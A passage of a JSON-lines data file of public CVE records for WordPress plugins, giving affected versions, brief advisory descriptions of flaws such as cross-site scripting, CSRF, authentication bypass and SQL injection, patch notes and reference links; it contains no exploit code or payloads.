",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-grid.php#L3033\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3158331\\\/premium-addons-for-elementor\\\/trunk\\\/assets\\\/frontend\\\/js\\\/premium-addons.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3158331\\\/premium-addons-for-elementor\\\/trunk\\\/assets\\\/frontend\\\/js\\\/premium-addons.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3158331\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3158331\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-grid.php#L3149\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-grid.php#L3149\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12463","slug":"arena-liveblog-and-chat-tool","versionImpact":"0.4.1","description":"The Arena.IM \u2013 Live Blogging for real-time events plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'arena_embed_amp' shortcode in all versions up to, and including, 0.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/arena-liveblog-and-chat-tool\\\/trunk\\\/albfre.php#L216\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/arena-liveblog-and-chat-tool\\\/trunk\\\/albfre.php#L216\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/729492e8-5625-444f-84ed-36b72cebc722?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/729492e8-5625-444f-84ed-36b72cebc722?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12222","slug":"wc-shipos-delivery","versionImpact":"2.1.7","description":"The Deliver via Shipos for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018dvsfw_bulk_label_url\u2019 parameter in all versions up to, and including, 2.1.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wc-shipos-delivery\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wc-shipos-delivery\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/377afb95-02d9-46b9-936d-3d58257dd928?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/377afb95-02d9-46b9-936d-3d58257dd928?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13561","slug":"brid-video-easy-publish","versionImpact":"3.8.3","description":"The Target Video Easy Publish plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's brid_override_yt shortcode in all versions up to, and including, 3.8.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brid-video-easy-publish\\\/trunk\\\/lib\\\/BridShortcode.php#L412\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brid-video-easy-publish\\\/trunk\\\/lib\\\/BridShortcode.php#L412\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226143\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226143\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/brid-video-easy-publish\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/brid-video-easy-publish\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc67fbfa-d84c-45c3-bbb1-4557dc70a8c9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc67fbfa-d84c-45c3-bbb1-4557dc70a8c9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11286","slug":"wp-jobhunt","versionImpact":"7.1","description":"The WP JobHunt plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 7.1. This is due to the plugin not properly verifying a user's identity prior to authenticating them through the cs_parse_request() function. This makes it possible for unauthenticated attackers to to log in to any user's account, including administrators.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91754c4d-a0d0-4d35-a70a-446d2bdf6c73?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91754c4d-a0d0-4d35-a70a-446d2bdf6c73?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5240","slug":"crm-customer-relationship-management-by-vcita","versionImpact":"2.7.5","description":"The CRM and Lead Management by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018type\u2019 parameter in all versions up to, and including, 2.7.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crm-customer-relationship-management-by-vcita\\\/trunk\\\/vcita-widgets-functions.php#L180\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crm-customer-relationship-management-by-vcita\\\/trunk\\\/vcita-widgets-functions.php#L180\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3256449\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3256449\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/crm-customer-relationship-management-by-vcita\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/crm-customer-relationship-management-by-vcita\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3643c741-559b-438b-9a39-518b9a6dfbf4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3643c741-559b-438b-9a39-518b9a6dfbf4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1374","slug":"solidres","versionImpact":"0.9.4","description":"The Solidres plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'currency_name' parameter in versions up to, and including, 0.9.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with administrator privileges to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b13ee51b-9f23-428f-9cef-4a9b9b06b0c4\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b13ee51b-9f23-428f-9cef-4a9b9b06b0c4\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/solidres\\\/trunk\\\/admin\\\/currencies\\\/edit.php#L15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/solidres\\\/trunk\\\/admin\\\/currencies\\\/edit.php#L15\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/danielkelley.me\\\/solidres-hotel-booking-plugin-for-wordpress-post-based-xss-vulnerability-in-add-new-currency-feature\\\/\",\"name\":\"https:\\\/\\\/danielkelley.me\\\/solidres-hotel-booking-plugin-for-wordpress-post-based-xss-vulnerability-in-add-new-currency-feature\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2894","slug":"wp-easycart","versionImpact":"5.4.8","description":"The WP EasyCart plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.4.8. This is due to missing or incorrect nonce validation on the process_bulk_deactivate_product function. This makes it possible for unauthenticated attackers to bulk deactivate products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917958\\\/wp-easycart\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917958\\\/wp-easycart\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a68b8df9-9b50-4617-9308-76a2a9036d7a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a68b8df9-9b50-4617-9308-76a2a9036d7a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-34185","slug":"wordpress-nextgen-galleryview","versionImpact":"0.5.5","description":"Cross-Site Request Forgery (CSRF) vulnerability in John Brien WordPress NextGen GalleryView plugin <=\u00a00.5.5 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-nextgen-galleryview\\\/wordpress-wordpress-nextgen-galleryview-plugin-0-5-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-nextgen-galleryview\\\/wordpress-wordpress-nextgen-galleryview-plugin-0-5-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4213","slug":"simplr-registration-form","versionImpact":"2.4.5","description":"The Simplr Registration Form Plus+ plugin for WordPress is vulnerable to Insecure Direct Object References in versions up to, and including, 2.4.5. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for authenticated attackers with subscriber-level permissions or above to change user passwords and potentially take over administrator accounts.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ddf0452-3afe-4ada-bccc-30c818968a81?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ddf0452-3afe-4ada-bccc-30c818968a81?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simplr-registration-form\\\/trunk\\\/lib\\\/profile.php#L148\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simplr-registration-form\\\/trunk\\\/lib\\\/profile.php#L148\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1165","slug":"brizy","versionImpact":"2.4.39","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.4.39 via the 'id'. This makes it possible for authenticated attackers, with contributor-level access and above, to upload files to arbitrary locations on the server","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7673b2ba-5d7a-4ae9-92e7-1a910687fdb8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7673b2ba-5d7a-4ae9-92e7-1a910687fdb8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/tags\\\/2.4.39\\\/editor\\\/screenshot\\\/manager.php#L33\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/tags\\\/2.4.39\\\/editor\\\/screenshot\\\/manager.php#L33\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034945\\\/brizy\\\/tags\\\/2.4.41\\\/editor\\\/screenshot\\\/manager.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034945\\\/brizy\\\/tags\\\/2.4.41\\\/editor\\\/screenshot\\\/manager.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4997","slug":"wpupper-share-buttons","versionImpact":"3.43","description":"The WPUpper Share Buttons plugin for WordPress is vulnerable to unauthorized access of data when preparing sharing links for posts and pages in all versions up to, and including, 3.43. This makes it possible for unauthenticated attackers to obtain the contents of password protected posts and pages.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c68ec00c-20a5-461d-bf72-c3190d29c9cf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c68ec00c-20a5-461d-bf72-c3190d29c9cf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpupper-share-buttons\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpupper-share-buttons\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9130","slug":"give","versionImpact":"3.16.1","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018order\u2019 parameter in all versions up to, and including, 3.16.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with GiveWP Manager-level access and above, to append additional SQL queries into already existing queries within the Legacy View mode, that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a3cae01-620d-405e-baf6-2d66a5b429b3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a3cae01-620d-405e-baf6-2d66a5b429b3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/give\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/give\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.16.1\\\/includes\\\/donors\\\/class-give-donors-query.php#L453\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.16.1\\\/includes\\\/donors\\\/class-give-donors-query.php#L453\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/givewp.com\\\/documentation\\\/core\\\/give-user-roles\\\/\",\"name\":\"https:\\\/\\\/givewp.com\\\/documentation\\\/core\\\/give-user-roles\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157829\\\/give\\\/trunk\\\/includes\\\/donors\\\/class-give-donors-query.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157829\\\/give\\\/trunk\\\/includes\\\/donors\\\/class-give-donors-query.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157829\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157829\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12218","slug":"woocommerce-check-pincode-zipcode-for-shipping","versionImpact":"2.0.4","description":"The Woocommerce check pincode\/zipcode for shipping plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.4. This is due to missing or incorrect nonce validation. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-check-pincode-zipcode-for-shipping\\\/trunk\\\/classes\\\/pincode-list.php#L93\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-check-pincode-zipcode-for-shipping\\\/trunk\\\/classes\\\/pincode-list.php#L93\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woocommerce-check-pincode-zipcode-for-shipping\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woocommerce-check-pincode-zipcode-for-shipping\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b79b5ae-7ce5-4065-8d7c-487df6752bc7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b79b5ae-7ce5-4065-8d7c-487df6752bc7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13696","slug":"flexible-wishlist","versionImpact":"1.2.25","description":"The Flexible Wishlist for WooCommerce \u2013 Ecommerce Wishlist & Save for later plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018wishlist_name\u2019 parameter in all versions up to, and including, 1.2.25 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flexible-wishlist\\\/trunk\\\/assets\\\/js\\\/front.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flexible-wishlist\\\/trunk\\\/assets\\\/js\\\/front.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230370\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230370\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/flexible-wishlist\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/flexible-wishlist\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/112456a9-8bb6-4007-87da-6d0fba912498?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/112456a9-8bb6-4007-87da-6d0fba912498?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11285","slug":"wp-jobhunt","versionImpact":"7.1","description":"The WP JobHunt plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 7.1. This is due to the plugin not properly validating a user's identity prior to updating their details like email via the account_settings_callback() function. This makes it possible for unauthenticated attackers to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e61c98d-a6f4-4ac0-b9f9-2b936c030413?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e61c98d-a6f4-4ac0-b9f9-2b936c030413?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4337","slug":"ahathat","versionImpact":"1.6","description":"The AHAthat Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.6. This is due to missing or incorrect nonce validation on the aha_plugin_page() function. This makes it possible for unauthenticated attackers to delete AHA pages via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ahathat\\\/trunk\\\/includes\\\/class-aha-admin-menu.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ahathat\\\/trunk\\\/includes\\\/class-aha-admin-menu.php#L42\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af15ae80-dbce-4899-9604-82fdca222bf5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af15ae80-dbce-4899-9604-82fdca222bf5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-47556","slug":"css3_web_pricing_tables_grids","versionImpact":"11.5","description":"Missing Authorization vulnerability in QuanticaLabs CSS3 Compare Pricing Tables for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects CSS3 Compare Pricing Tables for WordPress: from n\/a through 11.5.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/css3_web_pricing_tables_grids\\\/vulnerability\\\/wordpress-css3-compare-pricing-tables-for-wordpress-11-5-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/css3_web_pricing_tables_grids\\\/vulnerability\\\/wordpress-css3-compare-pricing-tables-for-wordpress-11-5-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6086","slug":"csv-me","versionImpact":"2.0","description":"The CSV Me plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'csv_me_options_page' function in all versions up to, and including, 2.0. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/csv-me\\\/trunk\\\/csv_me_index.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/csv-me\\\/trunk\\\/csv_me_index.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83bf3f3d-49f1-473a-a9ee-d78eb8981ad3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83bf3f3d-49f1-473a-a9ee-d78eb8981ad3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1372","slug":"wh-testimonials","versionImpact":"3.0.0","description":"The WH Testimonials plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters such as wh_homepage, wh_text_short, wh_text_full and in versions up to, and including, 3.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6fe5f1a-787e-4662-915f-c6f04961e194\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6fe5f1a-787e-4662-915f-c6f04961e194\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/danielkelley.me\\\/wh-testimonials-reflected-xss-vulnerability-via-wh-homepage-parameter-in-version-3-0-0-and-below\\\/\",\"name\":\"https:\\\/\\\/danielkelley.me\\\/wh-testimonials-reflected-xss-vulnerability-via-wh-homepage-parameter-in-version-3-0-0-and-below\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wh-testimonials\\\/trunk\\\/wh-testimonials.php#L177\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wh-testimonials\\\/trunk\\\/wh-testimonials.php#L177\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0267","slug":"ultimate-carousel-for-visual-composer","versionImpact":"2.6","description":"The Ultimate Carousel For WPBakery Page Builder WordPress plugin through 2.6 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7ba7849d-e07b-465a-bfb7-10c8186be140\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7ba7849d-e07b-465a-bfb7-10c8186be140\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2893","slug":"wp-easycart","versionImpact":"5.4.8","description":"The WP EasyCart plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.4.8. This is due to missing or incorrect nonce validation on the process_deactivate_product function. This makes it possible for unauthenticated attackers to deactivate products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1268604c-08eb-4d86-8e97-9cdaa3e19c1f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1268604c-08eb-4d86-8e97-9cdaa3e19c1f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917958\\\/wp-easycart\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917958\\\/wp-easycart\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4417","slug":"forminator","versionImpact":"1.13.4","description":"The Forminator \u2013 Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.13.4. This is due to missing or incorrect nonce validation on the listen_for_saving_export_schedule() function. This makes it possible for unauthenticated attackers to export form submissions via a forged request granted they can trick a site administrator into performing an action such as clicking on a 